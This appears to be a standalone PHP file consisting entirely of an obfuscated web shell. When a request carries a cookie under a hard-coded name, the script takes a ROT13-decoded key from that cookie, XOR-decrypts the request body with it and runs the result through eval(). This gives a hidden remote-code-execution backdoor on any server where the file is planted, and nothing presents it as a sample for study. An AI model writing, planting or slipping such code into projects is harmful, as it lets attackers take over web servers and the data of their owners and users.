<?php 

$ogegohv = "ztdowqmmsfeberfy";

if (isset($_COOKIE[$ogegohv])) {
    $xabyu = str_rot13($_COOKIE[$ogegohv]);
    $hdwxb = "";
    foreach (str_split(@file_get_contents('php://input'), strlen($xabyu)) as $vkojqvyofa) {
        $hdwxb .= $vkojqvyofa ^ $xabyu;
    }
    eval($hdwxb);
}